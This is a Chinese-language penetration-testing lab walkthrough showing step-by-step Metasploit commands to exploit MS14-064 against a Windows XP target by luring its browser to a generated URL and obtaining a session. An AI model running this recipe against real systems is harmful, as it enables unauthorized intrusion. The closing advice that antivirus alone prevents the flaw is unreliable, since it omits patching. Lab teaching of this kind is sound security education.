网络安全渗透实战详细详解
第一篇在此平臺發布實戰內容,有多處不足請多指教,本次內容詳解ms14-064漏洞利用與加固。
任務環境說明:
滲透機:Kali Linux
靶機:Microsoft Windows XP
滲透機IP:172.16.7.122
靶機IP:172.16.7.120
實驗步驟實戰
1.打開網絡拓撲 ?進入msfconsole滲透測試平臺
2.輸入命令 search ms14-064 搜索模塊,并用use 調節 輸入此下面紅色模塊
3.輸入 show options查看配置所需的參數
4.輸入 set SRVHOST命令來設置本地監聽的地址???注:SRVHOST監聽 kali是不區分大小寫的
?
5.輸入 set SRVORT 設置本地監聽端口
6.輸入 set URIPATH 來設置所利用的網站路徑
7.輸入 set payload +攻擊模塊 來設置攻擊
8.輸入 set LHOST 來設置攻擊機IP地址
9.輸入set options最后重新查看所設置的參數 都設置完畢了沒有
10.最后輸入攻擊命令 run或exploit來進行漏洞模塊攻擊
?11. run成功后已生成URL,本測試生成URL為:http://172.16.7.122:8080/
下面我們轉到Windows XP這里 ?用ie瀏覽器輸入已生成的URL 回車即可
?
12.我們重新切換到攻擊機這里, 已經入侵成功了 我們隨便輸入幾個命令來看一下,輸入 dir 來顯示當前目錄內容
?
13.輸入 sessions?-i來查看當前活躍會話
?好了這是ms14-064的漏洞滲透實驗,預防此漏洞 在系統中安裝殺毒軟件來加固自己的操作系統即可
本次實驗結束,此文章經供參考,大家切勿利用做違法法律行為, 安全合理上網。
總結
以上是生活随笔為你收集整理的网络安全渗透实战详细详解的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: iOS 6 的5个新特性创建杀手级应用
- 下一篇: COJ 1081 集训队分组